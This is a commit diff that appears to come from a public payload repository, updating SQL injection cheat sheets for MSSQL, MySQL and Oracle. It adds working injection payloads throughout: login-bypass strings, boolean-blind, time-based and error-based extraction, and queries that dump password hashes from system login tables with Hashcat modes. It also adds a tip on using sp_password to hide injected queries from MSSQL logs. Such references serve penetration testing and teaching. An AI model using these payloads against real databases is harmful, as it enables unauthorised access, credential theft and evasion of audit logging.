MySQL MSSQL Oracle SQL Update

SQL Injection/MSSQL Injection.md

@@ -2,15 +2,16 @@
 
 ## Summary
 
+* [MSSQL Default Databases](#mssql-default-databases)
 * [MSSQL Comments](#mssql-comments)
 * [MSSQL User](#mssql-user)
 * [MSSQL Version](#mssql-version)
 * [MSSQL Hostname](#mssql-hostname)
-* [MSSQL Database name](#mssql-database-name)
+* [MSSQL Database Name](#mssql-database-name)
+* [MSSQL Database Credentials](#mssql-database-credentials)
 * [MSSQL List databases](#mssql-list-databases)
 * [MSSQL List columns](#mssql-list-columns)
 * [MSSQL List tables](#mssql-list-tables)
-* [MSSQL Extract user/password](#mssql-extract-userpassword)
 * [MSSQL Union Based](#mssql-union-based)
 * [MSSQL Error Based](#mssql-error-based)
 * [MSSQL Blind Based](#mssql-blind-based)
@@ -25,12 +26,27 @@
 * [MSSQL Trusted Links](#mssql-trusted-links)
 * [MSSQL List permissions](#mssql-list-permissions)
 
+
+## MSSQL Default Databases
+
+| Name                  | Description                           |
+|-----------------------|---------------------------------------|
+| pubs	                | Not available on MSSQL 2005           |
+| model	                | Available in all versions             |
+| msdb	                | Available in all versions             |
+| tempdb	            | Available in all versions             |
+| northwind	            | Available in all versions             |
+| information_schema	| Availalble from MSSQL 2000 and higher |
+
+
 ## MSSQL Comments
 
-```sql
+| Type                       | Description                       |
--- comment goes here
+|----------------------------|-----------------------------------|
-/* comment goes here */
+| `/* MSSQL Comment */`      | C-style comment                   |
-```
+| `-- -`                     | SQL comment                       |
+| `;%00`                     | Null byte                         |
+
 
 ## MSSQL User
 
@@ -41,7 +57,7 @@ SELECT system_user;
 SELECT user;
 ```
 
-## MSSQL version
+## MSSQL Version
 
 ```sql
 SELECT @@version
@@ -51,7 +67,11 @@ SELECT @@version
 
 ```sql
 SELECT HOST_NAME()
-SELECT @@hostname;
+SELECT @@hostname
+SELECT @@SERVERNAME
+SELECT SERVERPROPERTY('productversion')
+SELECT SERVERPROPERTY('productlevel')
+SELECT SERVERPROPERTY('edition');
 ```
 
 ## MSSQL Database name
@@ -60,6 +80,22 @@ SELECT @@hostname;
 SELECT DB_NAME()
 ```
 
+
+## MSSQL Database Credentials
+
+* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
+    ```sql
+    SELECT name, password FROM master..sysxlogins
+    SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins 
+    -- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
+    ```
+* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe`
+    ```sql
+    SELECT name, password_hash FROM master.sys.sql_logins
+    SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
+    ```
+
+
 ## MSSQL List databases
 
 ```sql
@@ -88,17 +124,6 @@ SELECT table_catalog, table_name FROM information_schema.columns
 SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change delimeter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options  (Only works in MSSQL 2017+)
 ```
 
-## MSSQL Extract user/password
-
-```sql
-MSSQL 2000:
-SELECT name, password FROM master..sysxlogins
-SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
-
-MSSQL 2005
-SELECT name, password_hash FROM master.sys.sql_logins
-SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
-```
 
 ## MSSQL Union Based
 
@@ -141,6 +166,7 @@ AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -
 
 AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
 AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64-- 
+AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'
 
 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
 
@@ -159,7 +185,8 @@ ProductID=1';waitfor delay '0:0:10'--
 ProductID=1');waitfor delay '0:0:10'--
 ProductID=1));waitfor delay '0:0:10'--
 
-IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'     comment:   --
+IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
+IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';
 ```
 
 ## MSSQL Stacked Query
@@ -325,6 +352,15 @@ Check if current user is a member of the specified server role.
 SELECT is_srvrolemember('sysadmin');
 ```
 
+## MSSQL OPSEC
+
+Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_password`
+
+```sql
+-- 'sp_password' was found in the text of this event.
+-- The text has been replaced with this comment for security reasons.
+```
+
 ## References
 
 * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)

SQL Injection/MySQL Injection.md

@@ -2,7 +2,8 @@
 
 ## Summary
 
-* [MYSQL Comment](#mysql-comment)
+* [MYSQL Default Databases](#mysql-default-databases)
+* [MYSQL Comments](#mysql-comments)
 * [MYSQL Union Based](#mysql-union-based)
     * [Detect columns number](#detect-columns-number)
     * [Extract database with information_schema](#extract-database-with-information_schema)
@@ -35,15 +36,61 @@
 * [References](#references)
 
 
-## MYSQL comment
+## MYSQL Default Databases
 
-```sql
+| Name               | Description              |
-# MYSQL Comment
+|--------------------|--------------------------|
--- comment [Note the space after the double dash]
+| mysql              | Requires root privileges |
-/* MYSQL Comment */
+| information_schema | Availalble from version 5 and higher |
-/*! MYSQL Special SQL */
+	
-/*!32302 10*/ Comment for MYSQL version 3.23.02
+
-```
+## MYSQL comments
+
+| Type                       | Description                       |
+|----------------------------|-----------------------------------|
+| `#`                        | Hash comment                      |
+| `/* MYSQL Comment */`      | C-style comment                   |
+| `/*! MYSQL Special SQL */` | Special SQL                       |
+| `/*!32302 10*/`            | Comment for MYSQL version 3.23.02 |
+| `-- -`                     | SQL comment                       |
+| `;%00`                     | Nullbyte                          |
+| \`                         | Backtick                          |
+
+
+## MYSQL Testing Injection
+
+* **Strings**: Query like `SELECT * FROM Table WHERE id = 'FUZZ';`
+    ```
+    '	False
+    ''	True
+    "	False
+    ""	True
+    \	False
+    \\	True
+    ```
+
+* **Numeric**: Query like `SELECT * FROM Table WHERE id = FUZZ;`
+    ```ps1
+    AND 1	    True
+    AND 0	    False
+    AND true	True
+    AND false	False
+    1-false	    Returns 1 if vulnerable
+    1-true	    Returns 0 if vulnerable
+    1*56	    Returns 56 if vulnerable
+    1*56	    Returns 1 if not vulnerable
+    ```
+
+* **Login**: Query like `SELECT * FROM Users WHERE username = 'FUZZ1' AND password = 'FUZZ2';`
+    ```ps1
+    ' OR '1
+    ' OR 1 -- -
+    " OR "" = "
+    " OR 1 = 1 -- -
+    '='
+    'LIKE'
+    '=0--+
+    ```
 
 
 ## MYSQL Union Based
@@ -177,9 +224,6 @@ MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union se
 ```
 
 
-
-
-
 ## MYSQL Error Based
 
 ### MYSQL Error Based - Basic
@@ -191,6 +235,7 @@ Works with `MySQL >= 4.1`
 '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
 ```
 
+
 ### MYSQL Error Based - UpdateXML function
 
 ```sql
@@ -208,6 +253,7 @@ Shorter to read:
 ' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
 ```
 
+
 ### MYSQL Error Based - Extractvalue function
 
 Works with `MySQL >= 5.1`
@@ -220,6 +266,7 @@ Works with `MySQL >= 5.1`
 ?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
 ```
 
+
 ### MYSQL Error Based - NAME_CONST function (only for constants)
 
 Works with `MySQL >= 5.0`
@@ -230,6 +277,7 @@ Works with `MySQL >= 5.0`
 ?id=1 AND (SELECT * FROM (SELECT NAME_CONST(database(),1),NAME_CONST(database(),1)) as x)--
 ```
 
+
 ## MYSQL Blind
 
 ### MYSQL Blind with substring equivalent
@@ -306,13 +354,17 @@ SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l';
 
 The following SQL codes will delay the output from MySQL.
 
-```sql
+* MySQL 4/5 : `BENCHMARK()`
-+BENCHMARK(40000000,SHA1(1337))+
+    ```sql
-'%2Bbenchmark(3200,SHA1(1))%2B'
+    +BENCHMARK(40000000,SHA1(1337))+
-AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))  //SHA1
+    '%2Bbenchmark(3200,SHA1(1))%2B'
-RLIKE SLEEP([SLEEPTIME])
+    AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))  //SHA1
-OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
+    ```
-```
+* MySQL 5: `SLEEP()`
+    ```sql
+    RLIKE SLEEP([SLEEPTIME])
+    OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
+    ```
 
 ### Using SLEEP in a subselect
 
@@ -342,6 +394,7 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
 ?id=1 OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
 ```
 
+
 ## MYSQL DIOS - Dump in One Shot
 
 ```sql

SQL Injection/OracleSQL Injection.md

@@ -2,8 +2,12 @@
 
 ## Summary
 
-* [Oracle SQL version](#oracle-sql-version)
+* [Oracle SQL Default Databases](#oracle-sql-default-databases)
-* [Oracle SQL database name](#oracle-sql-database-name)
+* [Oracle SQL Comments](#oracle-sql-comments)
+* [Oracle SQL Version](#oracle-sql-version)
+* [Oracle SQL Hostname](#oracle-sql-hostname)
+* [Oracle SQL Database Name](#oracle-sql-database-name)
+* [Oracle SQL Database Credentials](#oracle-sql-database-credentials)
 * [Oracle SQL List databases](#oracle-sql-list-databases)
 * [Oracle SQL List columns](#oracle-sql-list-columns)
 * [Oracle SQL List tables](#oracle-sql-list-tables)
@@ -13,13 +17,42 @@
 * [Oracle SQL Command execution](#oracle-sql-command-execution)
 * [References](#references)
 
-## Oracle SQL version
+
+## Oracle SQL Default Databases
+
+| Name               | Description               |
+|--------------------|---------------------------|
+| SYSTEM             | Available in all versions |
+| SYSAUX             | Available in all versions |
+
+
+## Oracle SQL Comments
+
+| Type                       | Description                       |
+|----------------------------|-----------------------------------|
+| `-- -`                     | SQL comment                       |
+
+
+## Oracle SQL Version
 
 ```sql
 SELECT user FROM dual UNION SELECT * FROM v$version
+SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
+SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
+SELECT version FROM v$instance;
 ```
 
-## Oracle SQL database name
+## Oracle SQL Hostname
+
+```sql
+SELECT host_name FROM v$instance; (Privileged)
+SELECT UTL_INADDR.get_host_name FROM dual;
+SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
+SELECT UTL_INADDR.get_host_address FROM dual;
+```
+
+
+## Oracle SQL Database Name
 
 ```sql
 SELECT global_name FROM global_name;
@@ -28,6 +61,15 @@ SELECT instance_name FROM V$INSTANCE;
 SELECT SYS.DATABASE_NAME FROM DUAL;
 ```
 
+## Oracle SQL Database Credentials
+
+| Query                                   | Description               |
+|-----------------------------------------|---------------------------|
+| `SELECT username FROM all_users;`       | Available on all versions |
+| `SELECT name, password from sys.user$;` | Privileged, <= 10g        |
+| `SELECT name, spare4 from sys.user$;`   | Privileged, <= 11g        |
+
+
 ## Oracle SQL List Databases
 
 ```sql
@@ -71,12 +113,14 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
 | Column message exists in table log_table | SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; |
 | First letter of first message is t | SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |
 
+
 ## Oracle SQL Time based
 
 ```sql
-AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])                 comment:   -- /**/
+AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) 
 ```
 
+
 ## Oracle SQL Command Execution
 
 * [ODAT (Oracle Database Attacking Tool)](https://github.com/quentinhardy/odat)
@@ -140,4 +184,5 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
 * [NetSpi - SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
 * [ASDC12 - New and Improved Hacking Oracle From Web](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf)
 * [Pentesting Oracle TNS Listener - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener)
-* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc)
+* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc)
+* [WebSec CheatSheet - Oracle](https://www.websec.ca/kb/sql_injection#Oracle_Default_Databases)

SQL Injection/README.md

@@ -10,12 +10,15 @@ Attempting to manipulate SQL queries may have goals including:
 
 ## Summary
 
-* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md)
+* [CheatSheets](#cheatsheets)
-* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
+  * [MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md)
-* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md)
+  * [MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
-* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
+  * [OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md)
-* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md)
+  * [PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
-* [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md)
+  * [SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md)
+  * [Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md)
+  * [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md)
+  * [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md)
 * [Entry point detection](#entry-point-detection)
 * [DBMS Identification](#dbms-identification)
 * [SQL injection using SQLmap](#sql-injection-using-sqlmap)